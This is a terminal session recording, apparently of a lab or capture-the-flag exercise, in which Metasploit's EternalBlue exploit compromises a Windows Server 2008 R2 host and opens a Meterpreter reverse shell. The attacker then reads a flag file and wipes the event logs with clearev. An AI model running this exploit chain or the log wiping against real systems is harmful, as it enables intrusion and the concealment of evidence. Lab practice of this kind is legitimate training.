[89.208562, "o", "\r\nPayload options (windows/x64/meterpreter/reverse_tcp):\r\n\r\n   Name      Current Setting  Required  Description\r\n   ----      ---------------  --------  -----------\r\n   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)\r\n   LHOST     10.0.2.15        yes       The listen address (an interface may be specified)\r\n   LPORT     4444             yes       The listen port\r\n\r\n"]
[89.209251, "o", "\r\nExploit target:\r\n\r\n   Id  Name\r\n   --  ----\r\n   0   Automatic Target\r\n\r\n\r\n"]
[89.243979, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[91.092187, "o", "s"]
[91.0923, "o", "e"]
[91.092415, "o", "t"]
[91.092545, "o", " "]
[91.092631, "o", "R"]
[91.092714, "o", "H"]
[91.092828, "o", "O"]
[91.092904, "o", "S"]
[91.092998, "o", "T"]
[91.093115, "o", "S"]
[91.093215, "o", " "]
[91.093341, "o", "1"]
[91.093468, "o", "0"]
[91.093597, "o", "."]
[91.093872, "o", "0"]
[91.093951, "o", "."]
[91.094082, "o", "2"]
[91.09426, "o", "."]
[91.094425, "o", "7"]
[92.670299, "o", "\r\r\n"]
[92.677619, "o", "\u001b[0m"]
[92.683861, "o", "RHOSTS => 10.0.2.7\r\n"]
[92.71957, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[96.38213, "o", "e"]
[96.382244, "o", "x"]
[96.382315, "o", "p"]
[96.382439, "o", "l"]
[96.38253, "o", "o"]
[96.382626, "o", "i"]
[96.382717, "o", "t"]
[96.708433, "o", "\r\r\n"]
[96.715868, "o", "\u001b[0m"]
[96.978048, "o", "\r\n"]
[96.978544, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Started reverse TCP handler on 10.0.2.15:4444 \r\n"]
[96.998277, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.7:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check\r\n"]
[97.055911, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.0.2.7:445          - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)\r\n"]
[97.148701, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.7:445          - Scanned 1 of 1 hosts (100% complete)\r\n"]
[97.155246, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.0.2.7:445 - The target is vulnerable.\r\n"]
[97.156047, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.7:445 - Connecting to target for exploitation.\r\n"]
[97.169893, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.0.2.7:445 - Connection established for exploitation.\r\n"]
[97.170205, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.0.2.7:445 - Target OS selected valid for OS indicated by SMB reply\r\n"]
[97.170602, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.7:445 - CORE raw buffer dump (51 bytes)\r\n"]
[97.171009, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.7:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2\r\n"]
[97.171345, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.7:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard \r\n"]
[97.171744, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.7:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac\r\n"]
[97.182262, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.7:445 - 0x00000030  6b 20 31                                         k 1             \r\n"]
[97.182667, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.0.2.7:445 - Target arch selected valid for arch indicated by DCE/RPC reply\r\n"]
[97.182922, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.7:445 - Trying exploit with 12 Groom Allocations.\r\n"]
[97.183151, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.7:445 - Sending all but last fragment of exploit packet\r\n"]
[107.225388, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.7:445 - Starting non-paged pool grooming\r\n"]
[107.23059, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.0.2.7:445 - Sending SMBv2 buffers\r\n"]
[107.240726, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.0.2.7:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\r\n"]
[107.240972, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.7:445 - Sending final SMBv2 buffers.\r\n"]
[107.244205, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.7:445 - Sending last fragment of exploit packet!\r\n"]
[107.246569, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.7:445 - Receiving response from exploit packet\r\n"]
[107.247259, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.0.2.7:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!\r\n"]
[107.247491, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.7:445 - Sending egg to corrupted connection.\r\n"]
[107.248312, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.7:445 - Triggering free of corrupted buffer.\r\n"]
[107.326818, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Sending stage (200262 bytes) to 10.0.2.7\r\n"]
[107.551679, "o", "\u001b[0m"]
[108.183788, "o", "\u001b[0m"]
[108.522125, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.0.2.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n"]
[108.522348, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.0.2.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n"]
[108.522602, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 10.0.2.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\r\n"]
[108.646564, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Meterpreter session 1 opened (10.0.2.15:4444 -> 10.0.2.7:49319 ) at 2022-02-16 04:55:25 -0500\r\n"]
[108.652215, "o", "\r\n"]
[108.652383, "o", "\u001b[0m"]
[108.694117, "o", "\u001b[4mmeterpreter\u001b[0m > "]
[109.737547, "o", "s"]
[109.737688, "o", "he"]
[109.737888, "o", "l"]
[109.738031, "o", "l"]
[110.303306, "o", "\r\r\n"]
[110.310432, "o", "\u001b[0m"]
[110.464237, "o", "Process 648 created.\r\n"]
[110.472185, "o", "Channel 1 created.\r\n"]
[110.542527, "o", "Microsoft Windows [Version 6.1.7601]\r\r\nCopyright (c) 2009 Microsoft Corporation.  All rights reserved.\r\r\n\r\r\nC:\\Windows\\system32>"]
[111.375763, "o", "c"]
[111.509884, "o", "d"]
[111.634557, "o", " "]
[111.814387, "o", "."]
[111.980105, "o", "."]
[112.345282, "o", "\r\n"]
[112.416189, "o", "cd ..\r\n\r\r\nC:\\Windows>"]
[112.678894, "o", "c"]
[112.80377, "o", "d"]
[112.915909, "o", " "]
[113.098837, "o", "."]
[113.26558, "o", "."]
[113.547682, "o", "\r\n"]
[113.681006, "o", "cd ..\r\n\r\r\nC:\\>"]
[118.214756, "o", "dir ficherowindows.txt /s"]
[119.725487, "o", "\r\n"]
[119.866136, "o", "dir ficherowindows.txt /s\r\n Volume in drive C is Windows 2008R2\r\r\n Volume Serial Number is F8BF-2AF4\r\r\n"]
[120.802235, "o", "\r\r\n Directory of C:\\Windows\\System32\r\r\n\r\r\n06/14/2021  01:55 AM                33 ficherowindows.txt\r\r\n               1 File(s)             33 bytes\r\r\n"]
[121.927177, "o", "\r\r\n     Total Files Listed:\r\r\n               1 File(s)             33 bytes\r\r\n               0 Dir(s)  40,961,372,160 bytes free\r\r\n\r\r\nC:\\>"]
[125.26636, "o", "type C:\\Windows\\system32\\ficherowindows.txt"]
[126.347111, "o", "\r\n"]
[126.424979, "o", "type C:\\Windows\\system32\\ficherowindows.txt\r\n﻿Enhorabuena, me has encontrado\r\r\nC:\\>"]
[129.200709, "o", "^C"]
[129.201311, "o", "\r\nTerminate channel 1? [y/N]  "]
[130.257227, "o", "y"]
[130.692749, "o", "\r\n"]
[130.77596, "o", "\u001b[4mmeterpreter\u001b[0m > "]
[132.808432, "o", "c"]
[132.945699, "o", "l"]
[133.046511, "o", "e"]
[133.238815, "o", "a"]
[133.537068, "o", "r"]
[133.882425, "o", "e"]
[134.066317, "o", "v"]
[134.433107, "o", "\r\r\n"]
[134.440511, "o", "\u001b[0m"]
[134.577797, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Wiping 24 records from Application...\r\n"]
[134.765, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Wiping 99 records from System...\r\n"]
[134.952878, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Wiping 43 records from Security...\r\n"]
[135.038783, "o", "\u001b[4mmeterpreter\u001b[0m > "]
[135.74159, "o", "e"]
[135.947734, "o", "x"]
[136.050263, "o", "i"]
[136.186002, "o", "t"]
[136.641975, "o", "\r\r\n"]
[136.648996, "o", "\u001b[0m"]
[136.667788, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Shutting down Meterpreter...\r\n"]
[136.885567, "o", "\r\n"]
[136.885933, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 10.0.2.7 - Meterpreter session 1 closed.  Reason: User exit\r\n"]
[136.929754, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31mwindows/smb/ms17_010_eternalblue\u001b[0m) \u001b[0m> "]
[137.731741, "o", "e"]
[137.963482, "o", "x"]
[138.075207, "o", "i"]
[138.222155, "o", "t"]
[138.52398, "o", "\r\r\n"]
[138.531679, "o", "\u001b[0m"]
[138.797363, "o", "                                                                                                                                                                                            \r\r"]
[138.797559, "o", "\u001b]0;root@kali: /home/kali\u0007\r\n"]
[138.810071, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot💀kali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m/home/kali\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[138.81024, "o", "\u001b[?1h\u001b="]
[138.810819, "o", "\u001b[?2004h"]
[139.21044, "o", "\u001b[4mc\u001b[24m"]
[139.210753, "o", "\b\u001b[4mc\u001b[24m\u001b[38;2;153;153;153mlear\u001b[39m\b\b\b\b"]
[139.325967, "o", "\b\u001b[24m\u001b[1m\u001b[31mc\u001b[1m\u001b[31ml\u001b[0m\u001b[39m"]
[139.409619, "o", "\b\b\u001b[1m\u001b[31mc\u001b[1m\u001b[31ml\u001b[1m\u001b[31me\u001b[0m\u001b[39m"]
[139.624772, "o", "\b\u001b[1m\u001b[31me\u001b[1m\u001b[31ma\u001b[0m\u001b[39m"]
[139.794866, "o", "\b\b\b\b\u001b[0m\u001b[32mc\u001b[0m\u001b[32ml\u001b[0m\u001b[32me\u001b[0m\u001b[32ma\u001b[32mr\u001b[39m"]
[140.011182, "o", "\u001b[?1l\u001b>"]
[140.012268, "o", "\u001b[?2004l\r\r\n"]
[140.013117, "o", "\u001b[H\u001b[2J\u001b[3J"]
[140.013202, "o", "                                                                                                                                                                                            \r\r"]
[140.013227, "o", "\u001b]0;root@kali: /home/kali\u0007"]
[140.013433, "o", "\r\n"]
[140.025715, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot💀kali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m/home/kali\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K\u001b[?1h\u001b="]
[140.026277, "o", "\u001b[?2004h"]
[141.935848, "o", "\u001b[?2004l\r\r\n"]
